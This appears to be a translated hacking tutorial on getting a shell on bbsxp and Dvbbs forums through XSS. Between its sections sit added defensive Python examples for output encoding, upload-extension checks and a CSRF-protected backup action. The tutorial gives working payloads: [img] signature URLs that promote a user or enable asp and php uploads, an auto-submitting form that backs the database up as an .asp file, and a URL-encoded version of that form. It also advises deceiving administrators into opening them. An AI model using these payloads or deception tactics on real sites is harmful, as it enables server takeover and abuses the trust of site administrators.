Outline:
I. General introduction
   1. A simple description of what an XSS attack is
   2. How to find an XSS vulnerability
   3. General ideas for XSS attacks
II. Attacks from within
   1. How to find an internal XSS vulnerability
   2. How to construct an attack
   3. How to use it
   4. Instances of the attack, such as Dvbbs and bbsxp
III. Attacks from the outside
   1. How to construct an XSS attack
   2. How to deceive an administrator into opening it
IV. How XSS combines with other techniques
   1. Combination with MSSQL injection
   2. Combination with QQ cross-site vulnerabilities
   3. A cross-site vulnerability in a large domestic statistics website
   4. Social engineering
V. Making a scary Flash Trojan (construction method written by Li Fengxian)
Summary
Body:
I. General introduction to XSS
1. What is an XSS attack
XSS is also called CSS (Cross Site Script), cross-site scripting. It refers to a malicious attacker inserting malicious HTML code into a web page; when a user browses that page, the HTML code embedded in the page is executed, achieving the attacker's particular purpose. XSS is a passive attack; because it is passive and not easy to exploit, many people overlook how harmful it can be. This article is mainly about using XSS to obtain a shell on the target server. Although the technique is old, I hope the ideas will be helpful to everyone.
2. How to find an XSS vulnerability
Personally, I divide XSS attacks into two categories. One is the internal attack, which uses the target program's own vulnerabilities to construct a cross-site statement, such as the cross-site vulnerability in Dvbbs's showerror.asp. The other is the external attack, which mainly works by constructing a page of our own that carries an XSS cross-site vulnerability, or by finding a cross-site vulnerability somewhere other than the target. If we are going to infiltrate a site, we construct a web page that has a cross-site vulnerability, then construct a cross-site statement and, combined with other techniques such as social engineering, deceive the administrator of the target server into opening it. Then we use the techniques below to get a shell.
3. How to use it
Traditional cross-site exploitation usually involves the attacker building a cross-site page, placing a cookie-collecting page somewhere else, and then combining other techniques to get the user to open the cross-site page so that the user's cookie can be stolen for further attack. Personally, I think this approach is outdated; you probably already know its drawbacks: even if you collect cookies, you may not be able to penetrate further, because most passwords inside cookies are encrypted, and if you want to use the cookie for spoofing you are still subject to other conditions. The other line of thinking in this article solves these problems to some extent. For me, a more mature approach is to construct a cross-site form whose contents, when submitted with the administrator's privileges, take advantage of the program's backup function or add an administrator. I will introduce this technique in detail below.
II. Cross-site attacks from within
1. Looking for a cross-site vulnerability
If we have the code, it is easier: we mainly look at the places where user input reaches the page and check whether the variable has been checked for length and whether the characters "<", ">", ";", the single quote and the double quote are filtered. Also pay attention to tag closure. For example, when testing the QQ Group cross-site vulnerability, if you enter <script>alert('Test')</script> in the title, the code is not executed, because in the source code there are other tags that are not closed; a </script> is missing. At this point you only need to close that tag first: enter </script><script>alert('Test')</script> in the title and the code executes, popping up a Test box.
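The check described above (does user input reach the page with "<", ">" and quotes intact, and can it close a dangling tag?) is shown here next to the fix, which is to HTML-encode every user-controlled value at output time. This is an added example, not code from the original article or from QQ Group; the template, the function names and the sample titles are this example's own constructions, modelled on the unclosed-tag situation the text describes.

```python
import html
import re

# Added example, not code from the original article. The template mimics the
# QQ Group page the article describes: an earlier <script> block is never
# closed, so a plain <script>...</script> in the title lands inside that open
# block and does not run, while a title that first emits </script> closes it
# and then gets its own script element executed.
TEMPLATE = "<html><body><script>var x = 1;\n<h1>{title}</h1></body></html>"

# The two titles from the article's QQ Group test, plus a harmless one.
PLAIN_PAYLOAD = "<script>alert('Test')</script>"
CLOSING_PAYLOAD = "</script><script>alert('Test')</script>"
HARMLESS = "Hello world"

SCRIPT_ELEMENT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


def encode_for_html(value: str) -> str:
    """Escape &, <, >, " and ' so the value cannot open or close markup."""
    return html.escape(value, quote=True)


def render_unsafe(title: str) -> str:
    """The vulnerable pattern: user input pasted straight into the markup."""
    return TEMPLATE.format(title=title)


def render_safe(title: str) -> str:
    """The fix: encode at output time, regardless of any input-side filtering."""
    return TEMPLATE.format(title=encode_for_html(title))


def injected_script_bodies(markup: str) -> list:
    """Bodies of complete <script>...</script> elements other than the one
    that begins with the template's own code. These are the scripts a browser
    would actually execute as a result of the title."""
    bodies = SCRIPT_ELEMENT.findall(markup)
    return [b for b in bodies if not b.startswith("var x = 1;")]


def markup_chars_survive(value: str, rendered: str) -> bool:
    """The article's manual check, automated: does the raw value appear in the
    page with its <, > and quote characters unencoded?"""
    return any(c in value for c in "<>\"'") and value in rendered


if __name__ == "__main__":
    for title in (HARMLESS, PLAIN_PAYLOAD, CLOSING_PAYLOAD):
        print(repr(title),
              "unsafe:", injected_script_bodies(render_unsafe(title)),
              "safe:", injected_script_bodies(render_safe(title)))
```

With the unsafe renderer the plain payload yields no executable script (it is swallowed by the unclosed block, exactly as the article observes) while the closing payload yields one; with output encoding neither title produces a script element, which is why encoding at output is the control to look for rather than a blacklist of characters on input.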
2. How to use it
I will take bbsxp as an example first; the process has been recorded as an animation, and the details can be seen in the animation on the disc. Let me cite two of the more useful cross-site vulnerabilities in bbsxp.
A. First register an ordinary user; the user I registered here is Linzi. Then we write the following in our personal signature:
[img]http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1&posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1&regtime=2005-9-1+1%3a1%3a1&experience=9&country=%D6%D0%B9%FA&&submit=+%B8%FC+%D0%C2+[/img]
B. Then send a post; this can be combined with other techniques to deceive the administrator into browsing the post.
C. Since this is a test, we log in as the administrator and open the post; we find that Linzi has been promoted to a community staff role, as shown in the figure.
Besides this, we can simply enter the following in our personal signature:
[img]http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&posttime=3&timeout=6&onlinetime=12&reg10=10&style=1&selectup=fso&maxface=10240&maxphoto=30720&maxfile=102400&upfilegenre=gif|jpg|asp%20|rar[/img]
Again send a post and so on; as long as the administrator opens it, an upload extension of "asp " (with a trailing space) is added. After that you only need to upload a newmm.asp (with a trailing space) to get a shell.
The attack above is somewhat limited: although a shell can be obtained, the concealment is not very good, because the signature is limited in length and cannot exceed 255 characters. We can combine it with a Flash cross-site attack to achieve a more covert attack; for making the Flash Trojan, see the introduction by brother Feng below.
It is used again as follows:
Modify the URL of the personal avatar and enter the following code: admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&posttime=3&timeout=6&onlinetime=12&reg10=10&style=1&selectup=fso&maxface=10240&maxphoto=30720&maxfile=102400&upfilegenre=gif|jpg|php|rar
Then trick the administrator into opening your profile or browsing your posts. When the admin opens it, the php upload extension is automatically added in the background. Because bbsxp filters spaces in the personal avatar URL, we can only add extensions that do not contain spaces; of course you can also add a shtml extension, which can be used to view source code and then attack further.
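The upload-extension part of the technique above works because the whitelist is compared as exact strings and can be extended at run time by a request the administrator never meant to send. The following added example (not bbsxp's code) shows that naive check beside a hardened one that normalises the file name the way the file system will, compares case-insensitively and refuses server-executable extensions regardless of what the configured list says. The pipe-delimited list format follows the page's upfilegenre parameter; the function names and sample file names are this example's own assumptions.

```python
# Added example, not bbsxp's code: naive versus hardened upload-extension
# checking for a pipe-delimited whitelist of the form the page shows.

# Extensions the web server would execute rather than serve as data.
# Refused regardless of configuration, so a changed setting cannot re-enable them.
SERVER_SIDE_EXTENSIONS = {
    "asp", "asa", "aspx", "cer", "cdx", "php", "phtml", "shtml", "shtm", "stm",
}

# Constructed configurations: a default list, and the two lists the article's
# forged requests would install (trailing-space asp, and php).
DEFAULT_GENRE = "gif|jpg|rar"
GENRE_WITH_ASP_SPACE = "gif|jpg|asp |rar"
GENRE_WITH_PHP = "gif|jpg|php|rar"


def parse_genre(genre: str) -> list:
    return genre.split("|")


def naive_allows(filename: str, genre: str) -> bool:
    """Exact string comparison of the final extension against the list.
    'newmm.asp ' matches the entry 'asp ' even though the file system will
    store, and the server execute, the file as newmm.asp (Windows drops
    trailing spaces and dots from file names)."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext in parse_genre(genre)


def normalize_filename(filename: str) -> str:
    """Reduce to a bare name the way the target file system will see it:
    drop directories, then trailing spaces and dots."""
    name = filename.replace("\\", "/").split("/")[-1]
    return name.rstrip(" .")


def hardened_allows(filename: str, genre: str) -> bool:
    """Whitelist check on the normalised name, case-insensitive, with
    executable extensions refused even when the configured list lists them."""
    name = normalize_filename(filename)
    if "." not in name:
        return False
    ext = name.rsplit(".", 1)[-1].lower()
    if ext in SERVER_SIDE_EXTENSIONS:
        return False
    allowed = {e.strip().lower() for e in parse_genre(genre) if e.strip()}
    return ext in allowed


def compare(filename: str, genre: str) -> tuple:
    """(naive, hardened) verdicts for one upload, for side-by-side display."""
    return naive_allows(filename, genre), hardened_allows(filename, genre)


if __name__ == "__main__":
    for name, genre in (("photo.jpg", DEFAULT_GENRE),
                        ("newmm.asp ", GENRE_WITH_ASP_SPACE),
                        ("test.php", GENRE_WITH_PHP),
                        ("photo.JPG", DEFAULT_GENRE)):
        print(repr(name), compare(name, genre))
```

The side-by-side output makes the two defects visible at once: the naive check accepts "newmm.asp " while rejecting a legitimate "photo.JPG", and the hardened check reverses both verdicts. Keeping the deny-list in code rather than in an editable setting is what removes the value of forging the admin_setup request in the first place.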
III. Cross-site attacks from outside
Sometimes we cannot find a usable cross-site vulnerability in the target program. In that case we can start from the outside. Suppose the forum we want to take has very good security, but its message board has a cross-site vulnerability. We can then write a cross-site statement into the message board. The cross-site statement is a form that submits a privilege-escalating request to the forum, such as the bbsxp add-asp-extension statement above. Of course, we can also use the back-end backup function to get a shell directly.
Example: First upload a file linzi.txt with the following contents:
<body onload="javascript:document.forms[0].submit()"><form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"><input value="database/bbsxp.mdb" name="yl"><input value="database/shit.asp" name="bf"></form></body>
The above code backs up the forum's database as shit.asp. The message board's cross-site vulnerability is as follows:
http://127.0.0.1/bbsxp/page2.asp?username=
We construct the backup cross-site statement as follows:
http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%73%75%62%6d%69%74%28%29%22%3e%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%2f%62%62%73%78%70%2f%61%64%6d%69%6e%5f%66%73%6f%2e%61%73%70%3f%6d%65%6e%75%3d%62%61%6b%62%66%22%20%6d%65%74%68%6f%64%3d%22%70%6f%73%74%22%3e%3c%69%6e%70%75%74%20%76%61%6c%75%65%3d%22%64%61%74%61%62%61%73%65%2f%62%62%73%78%70%2e%6d%64%62%22%20%6e%61%6d%65%3d%22%79%6c%22%20%3e%3c%69%6e%70%75%74%20%76%61%6c%75%65%3d%22%64%61%74%61%62%61%73%65%2f%73%68%69%74%2e%61%73%70%22%20%6e%61%6d%65%3d%22%62%66%22%20%3e%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c%3e
Or construct a cross-site statement that uses a zero-size IFRAME to open linzi.txt.
When the administrator opens it, the backup runs automatically and we get a shell.
IV. Combining XSS with other techniques
From the above examples we can see that deceiving the administrator into opening the page is a very important step. Besides social engineering, we can combine other techniques, such as SQL injection. When we infiltrate a website whose main site has an MSSQL injection vulnerability with only public permissions, we can use an UPDATE to plant a cross-site statement, such as an IFRAME that opens the backup cross-site statement above to get a shell. We can also use social engineering, other cross-site vulnerabilities in QQ, and so on.
Deception is also an art; as for exactly how to use it, let everyone use their own imagination!
V. Making a Flash Trojan
Omitted.
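Every request in sections II and III (the [img] GETs in the signature and avatar, and the auto-submitted form in linzi.txt) succeeds only because the admin action accepts whatever the administrator's browser sends, with no proof that the administrator intended it and no limit on the backup file name. The following added example (not bbsxp's code) shows a hardened version of such a backup action: it requires POST, a same-origin Origin or Referer, a per-session CSRF token, and a backup name that is a plain .mdb file. The Request and Session shapes, SITE_ORIGIN, the csrf_token field and the scenario names are this example's assumptions; the parameter names yl and bf are taken from the page's form.

```python
import re
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Added example, not bbsxp's code: a hardened "back up the database" action
# that refuses the requests the article forges from the administrator's own
# browser. Request/Session shapes, SITE_ORIGIN and csrf_token are assumptions.

SITE_ORIGIN = "http://127.0.0.1"
# A backup may only be written as a plain .mdb file name inside the database
# directory, never under an executable extension or a different path.
SAFE_BACKUP_NAME = re.compile(r"^[A-Za-z0-9_-]{1,40}\.mdb$")


@dataclass
class Session:
    user: str
    is_admin: bool
    # per-session secret that a planted static form cannot know
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    params: dict
    headers: dict
    session: Optional[Session] = None


def same_origin(headers: dict) -> bool:
    origin = headers.get("Origin") or headers.get("Referer", "")
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def handle_backup(req: Request) -> tuple:
    """Return (status, message); 200 only when every check passes."""
    if req.session is None or not req.session.is_admin:
        return 403, "administrator login required"
    if req.method != "POST":
        # an <img src=...> or a bare link can only issue GET
        return 405, "state-changing action requires POST"
    if not same_origin(req.headers):
        # blocks a form hosted on another site; a same-origin XSS passes this,
        # so output encoding stays the primary defence
        return 403, "cross-origin request refused"
    token = req.params.get("csrf_token", "")
    if not secrets.compare_digest(token, req.session.csrf_token):
        # the article's planted form carries no token
        return 403, "missing or invalid CSRF token"
    target = req.params.get("bf", "")
    if not SAFE_BACKUP_NAME.match(target):
        return 400, "backup name must be a plain .mdb file name"
    return 200, "backed up %s to database/%s" % (req.params.get("yl", ""), target)


def run_scenarios() -> dict:
    """Constructed requests against one admin session; returns name -> status."""
    admin = Session("admin", True)
    forum_page = {"Referer": SITE_ORIGIN + "/bbsxp/page2.asp"}
    # the parameters of the page's planted form
    planted = {"yl": "database/bbsxp.mdb", "bf": "database/shit.asp"}
    genuine = {"yl": "database/bbsxp.mdb", "bf": "bbsxp-2005-09-01.mdb",
               "csrf_token": admin.csrf_token}
    scenarios = {
        "img_tag_get": Request("GET", planted, forum_page, admin),
        "planted_form_post": Request("POST", planted, forum_page, admin),
        "form_on_other_site": Request("POST", dict(genuine),
                                      {"Origin": "http://attacker.example"}, admin),
        "token_but_asp_name": Request("POST", {**genuine, "bf": "database/shit.asp"},
                                      forum_page, admin),
        "genuine_admin_post": Request("POST", genuine, forum_page, admin),
        "not_logged_in": Request("POST", genuine, forum_page, None),
    }
    return {name: handle_backup(req)[0] for name, req in scenarios.items()}


if __name__ == "__main__":
    for name, status in run_scenarios().items():
        print(name, status)
```

The order of the checks matters for what an attacker can learn: the token check comes last among the authorisation checks, and the file-name rule applies even to a fully authentic request, so a successful deception still cannot produce a file the server would execute.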